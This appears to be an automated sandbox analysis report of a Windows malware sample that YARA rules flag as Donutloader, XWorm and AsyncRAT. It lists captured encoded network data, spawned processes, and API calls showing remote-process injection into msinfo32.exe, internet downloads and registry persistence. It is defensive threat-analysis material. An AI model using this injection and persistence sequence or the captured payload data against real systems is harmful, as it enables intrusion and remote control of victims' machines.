1o5J/Ib+VIja+qSOgLla3u7e2HFIPzw2Nz6MFGZlXNwRalRHkjEwn/G7kwEuOjLXv2/4GJy810ZSQpMDvGz/JREGrwX3Of8ZYomsB/q2JhO4K74XaE0W0KL5ajZg5fdUIlqjOdg0ln01M5SZkI8aZTsqty0/8JFgI168sGUSSnKJ7G8Qdq1gCog6ciiMbt/67mR07ze4WjqPB8Ei87sE5XIFgyIhWvqVgNVt/7MSWlKAKnFifYPJJjsjcErFYZQ
2024-08-08 00:36:24 UTC	1369	IN	Data Raw: 33 62 65 35 0d 0a 57 49 55 7a 58 6b 75 66 43 4a 76 2b 71 58 44 56 52 33 6f 76 58 77 35 78 6d 66 55 56 79 79 62 69 63 78 48 6d 39 63 48 41 42 46 2f 58 64 2b 76 4e 79 66 77 42 57 57 59 4f 47 4b 38 57 70 58 31 62 6b 43 76 38 62 5a 6f 61 50 47 77 4f 34 47 46 7a 75 64 53 52 63 61 32 34 7a 6a 61 4b 56 2b 34 37 50 52 6d 6e 38 4e 49 36 39 51 59 46 4e 48 6d 5a 33 70 6f 65 62 72 4c 51 67 67 43 75 79 58 66 32 32 67 56 77 77 4a 77 39 72 2f 2b 73 71 68 5a 79 4c 6b 44 46 56 75 68 58 37 67 67 61 32 75 41 76 6e 73 72 37 6d 6e 58 4b 6a 6b 39 38 4a 79 65 69 71 6c 33 31 4e 37 32 4e 64 34 38 65 61 41 4b 62 44 2b 5a 53 4a 30 4f 57 6a 61 63 75 63 65 34 65 39 4e 64 41 66 52 51 70 47 30 69 33 55 78 71 4e 37 57 74 45 30 56 34 5a 50 73 38 43 53 36 68 2b 2b 44 35 6e 6c 61 73 4e 79 Data Ascii: 3be5WIUzXkufCJv+qXDVR3ovXw5xmfUVyybicxHm9cHABF/Xd+vNyfwBWWYOGK8WpX1bkCv8bZoaPGwO4GFzudSRca24zjaKV+47PRmn8NI69QYFNHmZ3poebrLQggCuyXf22gVwwJw9r/+sqhZyLkDFVuhX7gga2uAvnsr7mnXKjk98Jyeiql31N72Nd48eaAKbD+ZSJ0OWjacuce4e9NdAfRQpG0i3UxqN7WtE0V4ZPs8CS6h++D5nlasNy
2024-08-08 00:36:24 UTC	1369	IN	Data Raw: 73 74 34 36 6c 4a 33 43 34 6e 4b 73 71 43 51 63 53 63 73 6e 31 66 48 76 6c 57 6e 67 37 66 6e 67 38 59 4b 6a 4a 31 6b 30 36 6e 6e 73 36 6d 47 33 4f 42 32 30 7a 74 67 4f 79 72 30 65 70 6b 54 42 66 77 52 31 6f 31 52 74 4e 45 31 68 6b 71 6e 43 7a 75 73 56 66 37 76 6a 58 69 79 35 39 2b 76 4c 58 78 38 56 69 35 38 76 58 4f 4d 63 48 63 30 4e 70 62 57 70 39 4e 76 7a 2b 66 50 63 54 62 2b 52 53 35 35 53 37 32 50 4f 54 54 44 65 72 6e 78 72 36 49 39 69 43 6a 77 41 7a 6a 73 6d 6e 68 79 2f 31 33 75 63 74 73 53 5a 56 79 56 7a 6a 44 52 4c 4e 7a 65 49 5a 6b 38 63 4e 74 55 78 72 45 62 39 6f 32 42 63 73 41 36 50 51 54 58 6e 59 7a 57 79 6a 6d 58 51 76 49 38 58 62 6a 30 42 51 62 4b 66 62 48 5a 74 65 32 36 44 56 47 31 5a 51 67 4c 43 59 66 61 63 4d 2f 31 34 38 79 6e 59 57 65 4b Data Ascii: st46lJ3C4nKsqCQcScsn1fHvlWng7fng8YKjJ1k06nns6mG3OB20ztgOyr0epkTBfwR1o1RtNE1hkqnCzusVf7vjXiy59+vLXx8Vi58vXOMcHc0NpbWp9Nvz+fPcTb+RS55S72POTTDernxr6I9iCjwAzjsmnhy/13uctsSZVyVzjDRLNzeIZk8cNtUxrEb9o2BcsA6PQTXnYzWyjmXQvI8Xbj0BQbKfbHZte26DVG1ZQgLCYfacM/148ynYWeK
2024-08-08 00:36:24 UTC	1369	IN	Data Raw: 2f 4f 49 4e 35 33 4f 59 58 47 31 62 37 66 66 78 53 4b 64 79 47 6c 57 75 2f 6e 58 52 72 5a 46 6d 62 61 5a 62 6c 31 33 4e 76 52 44 59 31 57 6d 45 66 4a 70 66 36 66 34 4c 65 71 34 45 56 58 76 63 63 74 47 44 7a 55 43 30 79 38 69 76 38 4f 76 75 31 79 47 69 4f 30 69 31 47 66 46 53 61 6a 2b 45 41 68 54 7a 56 6b 52 2b 44 34 70 41 53 4b 62 73 6c 31 4e 6c 72 30 75 33 49 67 66 75 61 66 47 74 78 70 73 79 61 51 41 45 69 6b 66 43 67 35 63 35 79 42 37 78 61 38 59 34 7a 69 74 56 6b 77 2b 6c 35 61 6a 33 62 53 4b 34 73 30 66 36 33 32 47 51 4b 6b 34 4b 48 62 68 70 50 4b 6c 37 35 79 77 55 45 4a 78 6f 4b 43 64 35 43 42 74 65 66 35 5a 6c 5a 56 46 63 42 31 62 68 4d 76 58 39 62 47 37 6d 49 47 42 47 4e 36 2b 44 39 34 75 67 72 64 6b 53 32 52 69 4f 31 64 69 4a 37 2b 47 72 70 71 41 Data Ascii: /OIN53OYXG1b7ffxSKdyGlWu/nXRrZFmbaZbl13NvRDY1WmEfJpf6f4Leq4EVXvcctGDzUC0y8iv8Ovu1yGiO0i1GfFSaj+EAhTzVkR+D4pASKbsl1Nlr0u3IgfuafGtxpsyaQAEikfCg5c5yB7xa8Y4zitVkw+l5aj3bSK4s0f632GQKk4KHbhpPKl75ywUEJxoKCd5CBtef5ZlZVFcB1bhMvX9bG7mIGBGN6+D94ugrdkS2RiO1diJ7+GrpqA
2024-08-08 00:36:24 UTC	1369	IN	Data Raw: 4a 4d 73 36 78 6d 46 75 5a 47 67 73 37 6e 79 50 7a 33 79 5a 36 6d 76 33 47 6e 37 43 32 4d 44 38 42 42 44 49 63 72 38 78 58 6d 7a 69 5a 42 6c 30 48 7a 6d 2b 32 61 32 44 4c 42 48 31 41 38 58 36 4a 72 5a 55 68 42 76 37 68 4a 73 66 64 69 49 4f 57 33 56 36 41 4c 4c 30 71 6d 30 71 4e 6a 4a 2b 30 4a 41 5a 72 48 54 50 42 2b 6d 71 6e 74 50 6d 59 4a 5a 65 76 63 42 79 77 69 6f 51 77 31 38 52 35 39 61 69 57 44 44 4d 69 6b 39 53 72 38 53 74 79 77 56 6f 45 75 46 76 44 6d 67 73 34 6b 37 42 70 68 61 79 33 54 68 6b 30 32 59 73 32 42 75 74 76 6f 48 45 76 5a 33 51 64 72 53 42 64 68 7a 2f 63 32 33 52 34 37 2f 44 6f 56 55 67 71 4b 4e 4e 50 4f 4d 74 64 62 75 2b 6a 59 43 67 52 30 52 6d 6e 56 48 4a 53 49 61 34 68 2b 70 53 4e 50 50 43 72 73 79 35 66 6b 43 7a 61 39 61 35 30 4e 30 Data Ascii: JMs6xmFuZGgs7nyPz3yZ6mv3Gn7C2MD8BBDIcr8xXmziZBl0Hzm+2a2DLBH1A8X6JrZUhBv7hJsfdiIOW3V6ALL0qm0qNjJ+0JAZrHTPB+mqntPmYJZevcBywioQw18R59aiWDDMik9Sr8StywVoEuFvDmgs4k7Bphay3Thk02Ys2ButvoHEvZ3QdrSBdhz/c23R47/DoVUgqKNNPOMtdbu+jYCgR0RmnVHJSIa4h+pSNPPCrsy5fkCza9a50N0
2024-08-08 00:36:24 UTC	1369	IN	Data Raw: 35 43 47 69 6f 6e 48 48 4d 39 78 31 79 67 70 72 6f 57 2b 55 71 65 34 46 59 69 77 66 39 49 45 4c 73 30 6b 4a 75 63 33 4e 6e 73 32 42 57 6b 44 76 55 64 68 75 68 4e 61 64 76 6f 44 68 52 42 33 5a 50 7a 63 4c 49 58 61 37 59 77 67 6f 57 47 39 65 76 74 49 38 61 6f 39 6a 52 2f 4d 76 56 47 42 76 44 51 2b 64 32 30 6c 53 36 39 70 55 75 69 64 66 68 6c 7a 2f 32 67 46 47 43 50 30 43 56 73 58 42 77 64 30 51 36 30 43 37 39 52 4c 53 33 4c 68 4e 72 6d 66 79 2f 58 47 35 75 77 4d 6e 77 6f 32 32 74 6d 56 75 63 71 54 68 37 4b 42 4c 51 70 53 53 2b 4b 64 33 6d 57 7a 6f 76 41 4c 47 2f 56 66 43 6f 31 46 44 46 6e 6c 4a 42 62 6f 2f 79 56 65 42 58 6f 37 73 4d 51 52 55 6f 34 4f 43 61 2f 44 57 67 58 58 73 62 5a 4a 6c 62 55 58 50 4b 6e 2b 54 64 79 34 47 74 44 6e 57 42 2f 78 58 57 7a 31 Data Ascii: 5CGionHHM9x1ygproW+Uqe4FYiwf9IELs0kJuc3Nns2BWkDvUdhuhNadvoDhRB3ZPzcLIXa7YwgoWG9evtI8ao9jR/MvVGBvDQ+d20lS69pUuidfhlz/2gFGCP0CVsXBwd0Q60C79RLS3LhNrmfy/XG5uwMnwo22tmVucqTh7KBLQpSS+Kd3mWzovALG/VfCo1FDFnlJBbo/yVeBXo7sMQRUo4OCa/DWgXXsbZJlbUXPKn+Tdy4GtDnWB/xXWz1
2024-08-08 00:36:24 UTC	1369	IN	Data Raw: 30 58 56 4c 38 62 47 67 2b 7a 6e 34 62 31 55 30 34 71 30 76 73 57 6e 55 4e 46 58 53 69 77 41 57 6f 6b 61 55 2f 50 30 6b 43 6a 48 65 69 74 4b 6a 77 62 58 58 47 67 4b 4d 6e 73 4d 78 62 6f 73 35 64 4e 57 63 7a 6c 2b 55 45 6e 33 4e 6b 6e 69 79 4f 47 63 56 6a 37 79 6e 2f 79 4a 66 56 69 55 53 6c 37 59 50 61 6a 44 6f 5a 6d 70 79 51 58 63 61 47 74 71 63 61 52 2f 6d 45 58 39 4c 69 30 4d 64 75 37 41 33 2f 50 4b 69 68 6b 32 51 73 62 50 73 59 42 4e 31 48 6a 54 6e 64 63 69 68 74 45 50 50 68 58 41 53 55 39 72 30 42 79 34 38 4c 73 42 66 45 50 30 65 44 67 2b 6f 38 6f 7a 56 58 6b 58 6e 74 65 4e 73 34 32 52 47 37 53 48 2b 59 53 69 74 4e 47 78 39 4d 32 50 4f 52 35 4c 49 44 59 6f 43 32 39 63 4c 64 43 62 63 52 53 4c 75 70 4d 50 34 58 51 41 53 33 67 35 45 2b 59 6b 7a 63 56 6f Data Ascii: 0XVL8bGg+zn4b1U04q0vsWnUNFXSiwAWokaU/P0kCjHeitKjwbXXGgKMnsMxbos5dNWczl+UEn3NkniyOGcVj7yn/yJfViUSl7YPajDoZmpyQXcaGtqcaR/mEX9Li0Mdu7A3/PKihk2QsbPsYBN1HjTndcihtEPPhXASU9r0By48LsBfEP0eDg+o8ozVXkXnteNs42RG7SH+YSitNGx9M2POR5LIDYoC29cLdCbcRSLupMP4XQAS3g5E+YkzcVo
2024-08-08 00:36:24 UTC	1369	IN	Data Raw: 52 68 43 6a 53 51 77 68 37 6d 69 79 6c 36 4f 7a 51 6a 6f 50 6f 68 6b 6e 6a 35 38 44 30 59 32 74 6a 74 6d 33 49 5a 47 7a 4a 54 5a 73 62 52 76 76 75 42 43 61 6b 6a 53 34 45 33 6b 35 6e 41 45 71 47 7a 33 31 76 4c 5a 4b 4a 73 70 4d 32 58 56 6b 47 6d 43 67 54 55 32 4b 38 6c 5a 77 2f 61 37 7a 69 55 49 65 37 52 6f 61 63 66 6c 45 64 79 78 54 46 49 4f 30 62 43 48 65 41 74 2f 7a 74 73 4b 6f 6e 79 37 4f 61 4a 33 4a 4e 47 70 46 61 32 4d 35 52 71 47 54 43 63 5a 64 6f 2f 79 66 71 47 46 53 32 4c 33 4f 49 46 52 52 2b 54 61 54 45 37 47 36 43 6b 51 39 42 42 4f 74 6d 58 44 6b 54 70 56 36 4e 74 78 35 7a 46 79 6d 4a 67 6b 63 68 6c 46 53 56 37 30 7a 4f 52 6e 4a 75 6c 61 6e 7a 32 73 76 63 36 62 4d 4c 62 58 59 46 32 2b 6d 37 76 48 6e 44 38 75 42 50 78 63 5a 39 62 39 35 6d 78 58 Data Ascii: RhCjSQwh7miyl6OzQjoPohknj58D0Y2tjtm3IZGzJTZsbRvvuBCakjS4E3k5nAEqGz31vLZKJspM2XVkGmCgTU2K8lZw/a7ziUIe7RoacflEdyxTFIO0bCHeAt/ztsKony7OaJ3JNGpFa2M5RqGTCcZdo/yfqGFS2L3OIFRR+TaTE7G6CkQ9BBOtmXDkTpV6Ntx5zFymJgkchlFSV70zORnJulanz2svc6bMLbXYF2+m7vHnD8uBPxcZ9b95mxX

Target ID:	0
Start time:	20:35:59
Start date:	07/08/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe"
Imagebase:	0x290000
File size:	354'816 bytes
MD5 hash:	FF0BADEB5D6675C36D8F9068A1232258
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000003.1720661736.0000025E727F5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000003.1717644946.0000025E727D0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	20:35:59
Start date:	07/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	20:35:59
Start date:	07/08/2024
Path:	C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"
Imagebase:	0x7ff64f7a0000
File size:	385'024 bytes
MD5 hash:	0AED91DA63713BF9F881B03A604A1C9D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000002.00000002.4156638612.000001AA11010000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.4156799723.000001AA12890000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.4156799723.000001AA12890000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	20:36:14
Start date:	07/08/2024
Path:	C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe"
Imagebase:	0xb60000
File size:	354'816 bytes
MD5 hash:	FF0BADEB5D6675C36D8F9068A1232258
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000003.00000003.1863566508.000002806C4D0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000003.00000003.1863731126.000002806C4F5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 25%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	20:36:14
Start date:	07/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	20:36:14
Start date:	07/08/2024
Path:	C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"
Imagebase:	0x7ff64f7a0000
File size:	385'024 bytes
MD5 hash:	0AED91DA63713BF9F881B03A604A1C9D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000005.00000002.1897543968.00000204FD660000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.1897725884.00000204FD720000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000002.1897725884.00000204FD720000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.1896700546.0000020480001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000002.1896700546.0000020480001000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	20:36:22
Start date:	07/08/2024
Path:	C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe"
Imagebase:	0xb60000
File size:	354'816 bytes
MD5 hash:	FF0BADEB5D6675C36D8F9068A1232258
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000009.00000003.1943122985.00000282C50AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000009.00000003.1943224390.00000282C6D25000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000009.00000003.1943070023.00000282C6D10000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	20:36:22
Start date:	07/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	20:36:22
Start date:	07/08/2024
Path:	C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"
Imagebase:	0x7ff64f7a0000
File size:	385'024 bytes
MD5 hash:	0AED91DA63713BF9F881B03A604A1C9D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.1976262296.0000027ADEE40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.1976262296.0000027ADEE40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000B.00000002.1976117321.0000027ADED60000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.1976311824.0000027ADEF21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.1976311824.0000027ADEF21000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	55.5%
Total number of Nodes:	865
Total number of Limit Nodes:	6

Executed Functions

Function 00294AA1 Relevance: 85.4, APIs: 37, Strings: 10, Instructions: 3134injectionnetworkregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 002A1956: TlsGetValue.KERNEL32 ref: 002A1977
Part of subcall function 002A1956: memset.MSVCRT ref: 002A1A3F
Part of subcall function 002A1956: TlsGetValue.KERNEL32 ref: 002A1AB4
Part of subcall function 002A1956: TlsSetValue.KERNEL32 ref: 002A1AC1

LoadLibraryA.KERNELBASE ref: 00294F09
LoadLibraryA.KERNELBASE ref: 00294F3A
CreateProcessA.KERNELBASE ref: 0029523D

Part of subcall function 002CF130: WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 002CF28F

VirtualAllocEx.KERNELBASE ref: 00295430
WriteProcessMemory.KERNELBASE ref: 002954EE

Part of subcall function 002948C3: strlen.MSVCRT ref: 0029490A

CreateRemoteThread.KERNELBASE ref: 002956B8
VirtualProtectEx.KERNELBASE ref: 002958F8
WriteProcessMemory.KERNELBASE ref: 00295929
VirtualProtectEx.KERNELBASE ref: 00295A2F
VirtualProtectEx.KERNELBASE ref: 00295C01
WriteProcessMemory.KERNELBASE ref: 00295C2F
VirtualProtectEx.KERNELBASE ref: 00295D30
memset.MSVCRT ref: 00295E42
InternetOpenA.WININET ref: 00295E9B
InternetOpenUrlA.WININET ref: 00295EF2
InternetReadFile.WININET ref: 00295F23

Part of subcall function 00293444: memcpy.MSVCRT ref: 00293472

memset.MSVCRT ref: 00296962
memcpy.MSVCRT ref: 00296A25
memcpy.MSVCRT ref: 00296A64
memcpy.MSVCRT ref: 00296B2A
memcpy.MSVCRT ref: 00296E2B
memcpy.MSVCRT ref: 00296E6A
memcpy.MSVCRT ref: 00296F30
memset.MSVCRT ref: 00296FC8
VirtualAllocEx.KERNELBASE ref: 00297142
WriteProcessMemory.KERNELBASE ref: 002971A6
QueueUserAPC.KERNELBASE ref: 002971C2
ResumeThread.KERNELBASE ref: 002971E1
SetLastError.KERNEL32 ref: 0029733E
GetModuleFileNameW.KERNEL32 ref: 0029734B
GetLastError.KERNEL32 ref: 00297356
GetLastError.KERNEL32 ref: 0029736B
CopyFileExW.KERNEL32 ref: 00297D37
RegCreateKeyExA.KERNELBASE ref: 00297DC6
RegSetValueExA.KERNELBASE ref: 00297F12
GetLastError.KERNEL32 ref: 00298111
GetLastError.KERNEL32 ref: 00298627

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789, xrefs: 00294B00
@, xrefs: 0029712F
HANDLE:\, xrefs: 0029874A
.-), xrefs: 0029815C
Invalid AES key size., xrefs: 002985F9
E,), xrefs: 00296B74
appdata, xrefs: 00297443
AES-NI not supported on this architecture. If you are using the MSVC toolchain, this is because the AES-NI method's have not been ported, yet/mnt/c/Users/admin/.cargo/registry/src/index.crates.io-6f17d22bba15001f/rust-crypto-0.2.36/src/aesni.rs, xrefs: 00298596
[86!6f3', xrefs: 0029551A
called `Result::unwrap()` on an `Err` value, xrefs: 002980B1, 00298155, 002983B2, 002983E7, 00298571, 002985BA

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: memcpy$Virtual$ErrorLastProcess$MemoryProtectValueWritememset$CreateFileInternet$AllocLibraryLoadOpenThread$AddressCopyModuleNameQueueReadRemoteResumeSingleUserWakestrlen
String ID: .-)$@$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789$AES-NI not supported on this architecture. If you are using the MSVC toolchain, this is because the AES-NI method's have not been ported, yet/mnt/c/Users/admin/.cargo/registry/src/index.crates.io-6f17d22bba15001f/rust-crypto-0.2.36/src/aesni.rs$E,)$HANDLE:\$Invalid AES key size.$[86!6f3'$appdata$called `Result::unwrap()` on an `Err` value
API String ID: 1461981717-75148481
Opcode ID: 260120ef1be00b7aa491d3818069dd46dda74135e0f30d9b32fbaf2a3bd3d5e5
Instruction ID: 4661590946ae4ab177cb1108bbc7ce0e2494ba96198bf6491d37b843fa72d02f
Opcode Fuzzy Hash: 260120ef1be00b7aa491d3818069dd46dda74135e0f30d9b32fbaf2a3bd3d5e5
Instruction Fuzzy Hash: 69638E72228BC181EB20DB25E4547EAB364F785B84F848616DECD07B59DF78C66ACB40

Function 002AB6F0 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 373
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 002AB72B
CloseHandle.KERNEL32 ref: 002ABA84

Part of subcall function 002D28B0: RtlCaptureContext.KERNEL32 ref: 002D2935
Part of subcall function 002D28B0: RtlUnwindEx.KERNEL32 ref: 002D2953
Part of subcall function 002D28B0: abort.MSVCRT ref: 002D2959
Part of subcall function 002D28B0: abort.MSVCRT ref: 002D2970

MultiByteToWideChar.KERNEL32 ref: 002ABB34
WriteConsoleW.KERNEL32 ref: 002ABB73
WriteConsoleW.KERNEL32 ref: 002ABBDA
GetLastError.KERNEL32 ref: 002ABBE3
GetLastError.KERNEL32 ref: 002ABC4E

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 002ABA22

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast$ConsoleWriteabort$ByteCaptureCharCloseContextHandleMultiUnwindWide
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 3690811170-2333694755
Opcode ID: ccbafbfebb141457d75c273a2f1394f1fa269c0b7fbe138dbad1fa2a2cdd045a
Instruction ID: 7623b12e7a87205544bd8ea4e45ca8d7a523931c10cd081e463e5c11ccc5d4ea
Opcode Fuzzy Hash: ccbafbfebb141457d75c273a2f1394f1fa269c0b7fbe138dbad1fa2a2cdd045a
Instruction Fuzzy Hash: 89E123726207D18AEB22CF34D8443ED6761F746398F548222EE4907B9AEF78C6A5C300

Function 00291180 Relevance: 12.2, APIs: 8, Instructions: 205
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 002911E6
SetUnhandledExceptionFilter.KERNEL32 ref: 00291258
malloc.MSVCRT ref: 00291322
strlen.MSVCRT ref: 00291345
malloc.MSVCRT ref: 00291351
memcpy.MSVCRT ref: 00291365
GetStartupInfoA.KERNEL32 ref: 00291463

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
String ID:
API String ID: 649803965-0
Opcode ID: 56d3077b24a10557b69448890dda5a8fca88be95f18b9fc4ab5efc74502c2d62
Instruction ID: d7b78c4f2451c754cef4492e7b48e99a284227a600a72744cc8696316928cd24
Opcode Fuzzy Hash: 56d3077b24a10557b69448890dda5a8fca88be95f18b9fc4ab5efc74502c2d62
Instruction Fuzzy Hash: F581ED32B2079685EF20AF56E89976D3361FB49B80F848027CE0943755DF79C8B4CB40

